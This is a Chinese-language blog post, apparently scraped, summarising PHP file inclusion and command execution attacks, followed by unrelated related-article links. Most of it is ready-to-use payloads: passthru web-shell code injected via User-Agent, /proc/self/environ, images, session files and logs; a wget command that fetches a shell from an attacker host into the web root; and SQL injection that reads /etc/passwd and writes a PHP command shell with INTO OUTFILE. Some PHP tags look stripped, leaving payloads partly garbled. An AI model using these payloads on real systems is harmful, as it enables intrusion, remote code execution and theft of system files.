php命令执行脚本文件,PHP文件包含与命令执行方式总结
如果不成功,把<?转为16进制 。
不行的话还可以把段字符放在header字段里面,比如说User-Agent、Referer
利用方式2:通过环境变量进行插入
/proc/self 指向最后一个PID使用的链接。
/proc/self/environ 是一个已知的路径,但是一般用户没权限读取。
在linux系统中,/proc/self是因为是个能写的环境变量,而且位置是固定的。
利用的话先把利用代码放在User-Agent进行提交,
然后请求:http://host/?file=../../../proc/self/environ&cmd=uname -a
利用方式3:将代码插入到图片中
讲一句话添加到图片中,然后上传直接利用。
http://host/?file=path/avatar.gif&cmd=uname -a
利用方式4:将代码插入到session文件中
如果是通过session验证的,并且知道session的字段。
http://host/?user= passthru($_GET[cmd]) ?>
找session值(浏览器)和文件位置(一般/tmp/session值)。
然后直接包含。
利用方式5: 其他文件
其他日志,FTP的话提交用户名为 passthru($_GET[cmd]) ?>
服务器版本较老的话,可以利用PUT方式提交代码。
利用方式6:获取shell
http://host/?file=xxxx&cmd=wget http://devil/shell.txt -O shell.php
3、注入与文件包含
方式1:注入读取关键文件
http://host/?id=-1 UNION SELECT 1,2,3,load_file(‘/etc/passwd’);
magic_quotes开启的话
http://host/?id=-1 UNION SELECT 1,2,3,load_file(0x2f6574632f706173737764);
方式2:先导出然后读取
http://host/?id=1 outfile “/tmp/sql.txt”
http://host/?id=-1 UNION SELECT 1,2,3,load_file(‘/tmp/sql.txt’);
方式3:直接生成一句话
http://host/?id=-1 union select 1,load_file(“/etc/passwd”),1 into outfile “/var/www/host.com/www/passwd”
http://host/?id=-1 union select 1,”<?phpinfo ()?>”,1 into outfile “/var/www/host.com/www/phpinfo.php”
如果目录不能写,可以先导出到tmp
http://host/?id=-1 union select 1,” passthru($_GET[cmd]) ?>”,1,1 into outfile “/tmp/sql.txt”
php命令执行脚本文件,PHP文件包含与命令执行方式总结相关推荐
- Linux命令+shell脚本大全:文件和目录列表
要想知道系统中有哪些文件,可以使用列表命令( ls ).本节将描述 ls 命令和可用来格式化 其输出信息的选项. 3.5.1 基本列表功能 ls 命令最基本的形式会显示当前目录下的文件和目录: $ l ...
- linux 每周日执行脚本,Linux任务计划和周期性任务执行
linux计划任务有两类 at:未来某个时间点仅执行一次任务就结束的指令,at指令执行时必须要有atd这个服务支持. crontab:可以以时间单位为分钟,小时,每天,每周,每月,每年等循环执行某任务 ...
- 离线调用linux命令,GitHub - rinetd/linux-command: Linux命令大全搜索工具,内容包含Linux命令手册、详解、学习、搜集。...
Linux Command 516 个 Linux 命令大全,内容包含 Linux 命令手册.详解.学习,值得收藏的 Linux 命令速查手册.请原谅我写了个爬虫,爬了他们家的数据linuxde.ne ...
- 实验楼linux命令,GitHub - encorechow/linux-command: Linux命令大全搜索工具,内容包含Linux命令手册、详解、学习、搜集。...
Linux Command 516 个 Linux 命令大全,内容包含 Linux 命令手册.详解.学习,值得收藏的 Linux 命令速查手册.请原谅我写了个爬虫,爬了他们家的数据linuxde.ne ...
- spark常用的linux命令,GitHub - Sparkinzy/linux-command: Linux命令大全搜索工具,内容包含Linux命令手册、详解、学习、搜集。...
Linux Command 516 个 Linux 命令大全,内容包含 Linux 命令手册.详解.学习,值得收藏的 Linux 命令速查手册.请原谅我写了个爬虫,爬了他们家的数据linuxde.ne ...
- crontab执行脚本发邮件中文乱码,手动执行没有问题
今天写了个脚本,定时给指定邮箱发送邮件,手动执行的时候没有问题,但添加到计划任务后发送的邮件就中文乱码,变成一个不知名的附件形式: 上网查了下原因 产生原因: 这是因为Unix/Linux下使用cro ...
- node.js require 自动执行脚本 并生成html,从HTML页面执行Nodejs脚本?
小编典典 我使用普通的JS而非咖啡脚本,因此这是每个Fosco注释(称为server.js)的示例: var express = require('express'), list = require( ...
- Vbs脚本将本地文件上传到Azure存储账户
说到Azure相信大家都已经非常熟悉了,所以就不做多介绍了,我们都知道在Azure上有一个存储账户,在存储账户下可以可以创建容器,可以存放数据,近期公司呢为了达到数据的安全性,准备将本地的备份数据给A ...
- PHP 命令行模式实战之cli+mysql 模拟队列批量发送邮件(在Linux环境下PHP 异步执行脚本发送事件通知消息实际案例)...
源码地址:https://github.com/Tinywan/PHP_Experience 测试环境配置: 环境:Windows 7系统 .PHP7.0.Apache服务器 PHP框架:ThinkP ...
- 后台执行UNIX/Linux命令和脚本的五种方法
http://hankjin.blog.163.com/blog/static/337319372010111492348473/ 2010-12-14 09:35:48| 分类: Unix | ...
最新文章
- 开源云联盟耿航:中国开源软件的发展趋势
- php处理不确定笛卡尔积,PHP笛卡尔积实现算法示例
- LDD3源码分析之ioctl操作 .
- 1270: [BeijingWc2008]雷涛的小猫
- WinCC归档数据报表控件
- ES语法及-IK分词器
- 如何在Word,Excel和PowerPoint 2010中裁剪图片
- 【专升本计算机】2021年甘肃省专升本计算机全真模拟试题(二)
- 谢烟客---------Linux之DNS服务系统的基础知识
- 【操作系统】系统调用
- 数据结构-排序基础代码
- 中国物联网发展年报出炉
- linux如何删除tree命令,误删tree命令如何恢复
- BlackBerry7290软件安装——电子书阅读Mobipocket
- PMP证书真的有用吗?
- qcow2文件的snapshot管理
- 帆软函数:阿拉伯数字转中文、阿拉伯数字转人民币大写
- 《算法导论》学习笔记第一章
- dcs常用的冗余方式_dcs试题
- python篮球游戏单机下载_NBA 2K20
热门文章
- python textrank_TextRank算法提取文本摘要
- sql 临时表_深度分析 | JDBC与MySQL临时表空间的分析
- cython 安装升级_Anaconda安装pytorch,torchvision和 cython
- HNU 实验五 小女孩与楼梯
- nlp-tutorial代码注释1-2,词向量、Word2Vec、Skip-gram简述
- Could NOT find OpenSSL, try to set the path to OpenSSL root folder in the system variable
- [转]linux用户管理
- [转]nonlocal和global
- Altium AD20大电流表层开窗,用特殊粘贴复制平面区域到其他层,阻焊开窗显示沉金LOGO
- AMS磁编码器:AS5048与AS5047区别,伺服电机闭环系统位置反馈